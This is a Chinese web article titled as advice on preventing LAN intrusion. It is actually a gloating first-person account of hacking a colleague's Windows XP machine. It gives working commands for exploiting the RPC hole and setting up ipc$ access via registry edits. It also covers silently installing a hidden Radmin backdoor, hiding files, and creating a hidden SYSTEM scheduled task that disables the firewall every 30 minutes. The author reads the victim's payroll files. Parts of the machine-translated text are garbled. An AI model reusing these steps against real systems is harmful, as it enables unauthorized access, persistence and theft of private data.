大家好,小蜜来为大家解答以上问题。如何防局域网入侵,局域网入侵很多人还不知道,现在让我们一起来看看吧!
仅供参考,我首先打开命令提示符,并使用ping命令来ping它。
回复自192 . 168 . 16 . 4: bytes=32 time 1 ms TTL=128,说明对方没有防火墙,可能被入侵。
接下来我用X-SCAN 3.2详细扫描了一下。
对方电脑的操作系统是XP。
众所周知,XP系统是相当安全的,在一些黑客论坛上也有很多关于黑客攻击XP的话题讨论。
只有两种方法可以侵入这样的系统。
一种是使用钓鱼,这是一种被动的方式,让对方计算机获得木马控制它。
第二种方法是如果对方有严重的漏洞,比如RPC溢出。
这种情况用溢出程序溢出,然后上传控制程序控制。
扫描的结果真的让我开心了一段时间。
对方电脑有很多漏洞,其中一个就是冲击波利用的RPC漏洞。
这个漏洞相当有名,2003年席卷全球。
知道了它有这个漏洞,接下来就是找一个溢出程序,这让我忙活了很久,因为有些溢出程序对这台电脑似乎是无效的。
这些工具的名字我记不清了,反正有好几个。
最后,我发现了一个溢出程序,XP.EXE,它终于溢出了电脑。
找到一个CMDSHELL。
这是一个小小的胜利。
拿到控制程序后如何上传到CMDSHELL?我想了一会儿,终于有了灵感。
我和它在一个局域网,分享是最方便的上传方式。
于是我打开网上邻居,查看工作组电脑,找到这台电脑,双击,进不去。
我不记得留言了。
据我分析,可能是对方电脑没有运行网络安装向导,因为是XP,所以需要运行这个向导来共享文件。
运行此向导的功能是配置本地安全策略。
您可以打开控制面板-管理工具-本地安全策略,然后展开本地策略。
右边有一个安全策略——“拒绝从网络访问这台计算机”。
我觉得必须在对方电脑的相应策略中设置GUEST用户,这也是我无法打开其共享的原因。
因为共享访问是由这个GEUST用户默认登录的,所以我不能访问它的共享,因为它的安全设置不允许GUEST从网络访问。
因为XP默认的共享模式是简单文件共享。
这与WIN2000系统不同。
如果是WIN2000系统,可以在知道管理员密码的情况下,使用命令net使用IPipc$' password' /user:用户名与对方建立ipc$连接,然后使用复制木马ipd$等命令将木马上传。
XP做不到这点。
即使知道它的管理员密码,也无法用上面的命令建立ipc$连接。
这也是XP比2000系统更安全的原因。
接下来我想做的是把XP的分享模式修改为2000。
方法如下:在溢出获取的CMDSHELL下,键入命令:echo windows注册表编辑器版本5.00c 3360123.reg echo [HKEY _本地_机器系统当前控制设置控制] C:123。
注册回声。
C:123。
reg echo ' force guest '=dword 3360000000 c 3360123。
reg regedit/e c3360123。
reg等。
在这些命令之后,另一个XP的共享模式已经和2000的一样了。
让我解释一下这些命令的含义。
回显Windows注册表编辑器版本5.00C3360123.reg该命令是将Windows注册表编辑器版本5.00的字符保存到c:123.reg文件中。
大家需要注意第一句话和后面几句话的区别。
字符被覆盖和附加。
回声。
c:123.reg命令第三句是追加一个空行,这一点很重要。
如果不加上这句话,就不可能成功。
你可以打开一个注册表文件看看。
这是格式,第二行是空的。
这一点必须注意。
执行完前四个命令后,会出现一个123。
会在对方c盘下生成reg文件,内容如下:Windows注册表编辑器5.00版[HKEY _ local _ machinesystemcurrentcontrolsetcontrolsa]' force guest '=dword :00000000第五个命令是将这个REG文件导入注册表中。
执行完这五个命令,我就可以像操作2000系统一样,用ipc$来控制了。
接下来,上传控制程序。
我选的是RADMIN2.0的服务程序,有人问这个安装需要在图形界面下。
我说不用那么麻烦,安装在CMDSHELL下就可以了。
在安装之前,我们需要先做好准备,先生成一个REG文件,文件名:aaa.reg有以下内容:Windows注册表编辑器5.00版【HKEY _ local _ machinesystemradminv 2.0服务器参数】'禁用托盘图标'=Hex:01,00,00,00功能是使生成的服务器程序在通知栏隐藏图标,我们都知道RADMIN服务器程序正常安装后,通知栏有一个小图标。
如果我们要侵犯人,当然要把这个小图标去掉,否则会被发现。
然后生成一个BAT文件,我命名为aaa.bat,内容如下:r _ server/install/silencer _ server.exe/port3360.2233 /pass:1 /save /silence regedit.exe /s aaa.reg net start r_server 这些命令是安装命令,设置连接端口为:2233 密码是:1 隐藏安装界面的方式安装 然后就是将aaa.reg导入注册表,启动r_server服务。
准备工作作好后,就要上传文件了,一共需上传4个文件,aaa.reg aaa.bat r_server.exe admdll.dll 后两个文件是RADMIN安装目录下的,在安装了RADMIN2.0客户端后,安装目录里就有这两个文件。
我先建立ipc$连接 net use 192.168.16.4ipc$ "" /user:administrator 提示:命令成功完成。
接着: copy r_server 192.168.1.4admin$system32 copy aaa.bat 192.168.1.4admin$system32 copy aaa.reg 192.168.1.4admin$system32 copy admdll.dll 192.168.1.4admin$system32 然后再进入溢出得到的CMDSHELL下键入: attrib +s +h +r c:windowssystem32r_server.exe attrib +s +h +r c:windowssystem32admdll.exe attrib +s +h +r c:windowssystem32aaa.bat attrib +s +h +r c:windowssystem32aaa.reg 这些命令是将这4个文件设置成系统隐藏只读文件,不容易被对方管理员发现。
下一步就是运行aaa.bat了,就这么简单,运行成功后,我用radmin2.0客户端设置了一下连接参数,端口改成2233,连接成功,密码是1,成功地看到了对方的屏幕。
呵呵,成功了,从有入侵的想法到入侵成功进行控制,只用了短短的4天时间。
进入后看到对方电脑上正在玩QQ保皇游戏,不过我也犯了个错误我给它新建了个管理用户,原先是打算用于ipc$连接用的,可我上传RADMIN控制后忘记删掉了,我在溢出的CMDSHELL 下不小心键入了命令EXIT,结果对方电脑出现了倒计时关机的界面,我也没有及时处理掉,我当时要是用RADMIN的CMD功能,键入命令 shutdown -A就可以取消这个倒计时关机的界面,可当时我也没有及时处理,导致对方电脑重启了,重启后我估计对方管理员看到了我新建的用户了,后来我用RADMIN 远程查看时,也觉得这个新建用户太招摇了,用户名就是ip$ ,图标是个大红的花朵。
下午的时候我发现那台电脑的管理员请了位高手来助阵了,因为我们这个局域网中的各台电脑都通过我们办公室里的那台电脑连接到 上,所以,那位高手先到我们办公室电脑上查看了一番没有发现问题后,他将原先安装的江民换成了卡巴了,我估计他认为攻击是来自 上,岂不知黑客就在他眼皮底下,嘿嘿。
那位高手又给被我控制了的电脑上安装了卡巴,原先的杀毒软件是诺顿,对WINDOWS也进行了更新,可这些作法都晚了,因为我已经控制你了,再打补丁也无用了。
经过那位高手一番检查与修补后,我的后门依然存在着,看来那位高手水平也不怎么样。
我给它开放的ipc$功能,他也没发现。
也许他只认为是一次简单的病毒攻击,而掉以轻心了,而不知他的一举一动都在我的监视之下。
哈哈。
接下来的工作对我来说就比较简单了,给它开telnet服务器,开“远程桌面”这个我采用的是图形的方式进行操作的,中午下班后我等这台计算机管理员走后,用RADMIN登录进去进行了一些设置工作。
后来也通过RADMIN的文件管理功能翻看了这台电脑上的文件,有一些财务报表,工资表之类的东西,这些对我来看没什么大的吸引力。
不过我看到了我们集团老总的工资,每月一万多块钱呢!!好黑啊。
这么多,我工资只有区区几百块,真是太不公平了,愤愤不平中。
后来一次通过RADMIN操作对方的电脑时不小心被管理员发现了,我想对方的管理员也很感到意外, windows的补丁打上了,还装了强悍的卡巴,还是搞不定黑客!!哈哈,因为卡巴不是杀RADMIN的。
后来对方那个管理员启用了局域网“本地连接”中的防火墙功能,这样我无法连接它的电脑了。
因为RADMIN是正向连接的,所以在对方开防火墙的情况下是无法使用的。
有一次下午下班后我无意地ping 了一下这台电脑的IP,居然有返回。
说明对方防火墙关闭了,我马上用RADMIN连接,居然成功。
我晕。
原来对方只开了防火墙,并没有发现这个明显的后门。
我想开防火墙也是那位电脑高手给搞的,依那个管理员的水平是想不到这个办法的。
不过telnet服务器给关闭了,3389远程桌面也给关了,共享模式也被修改回了原先的样子。
看来那位高手也是发现了一些漏洞并补上了,但是那个后门,他却没有发现,这就给我创造了第二次入侵的机会。
他有政策我有对策,他可以开防火墙,我可以给他关掉,有人问要是再被管理员开启了防火墙,那岂不是没得玩了。
哈哈。
我下面给出一个我自己研究出来的独门密方,保证百病!哈哈。
我的方法是创建一个隐藏的计划任务。
让这个计划任务每隔半个小时杀除一遍防火墙,这样即使对方管理员打开防火墙也起不了什么作用。
方法如下:先建一个批处理文件abc.bat,放在c:windowssystem32目录下,内容如下: net stop sharedaccess 当然也可以附加点别的,比如说你想半小时杀除一遍天网防火墙,可以再加上下面的命令: taskkill /IM rfw.exe /f 如果想使共享模式是高级共享模式,可以再加上下面的命令: regedit /e c:windowssystem32abc.reg 当然这需要事先上传一个abc.reg到它的c:windowssystem32目录下,内容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] "forceguest"=dword:00000000 下面我说一下创建隐藏计划任务的方法: 在对方电脑的CMDSHELL下键入命令: schtasks /create /tn "常驻" /tr c:windowssystem32abc.bat /sc minute /mo 30 /ru "system" 这样就在对方电脑上建立了一个以SYSTEM权限运行的计划任务,这个计划任务每隔30分钟运行一次c: windowssystem32abc.bat,功能嘛,就是根据abc.bat里面的命令行决定了,可以说这个新发现是相当厉害的,利用的巧妙,功能可以相当强大。
如果只有这样还不能达到隐藏的要求,你打开控制面板—任务计划,仍然可以发现它的存在。
好的,下面说说隐藏它的方法。
还是进入 CMDSHELL中。
键入命令attrib +h c:windowstasks常驻.job回车后,你再到控制面板的任务计划中看一下是不是以前的任务消失了。
这只是表面消失,实际是它还是存在的。
你可以在CMDSHELL下键入命令:schtasks查看。
这样不管对方管理员怎样修改设置,每隔半小时就又会补修改回来。
它想摆脱我的控制可说是难上加难了。
哈哈。
本文到此结束,希望对大家有所帮助。
标签: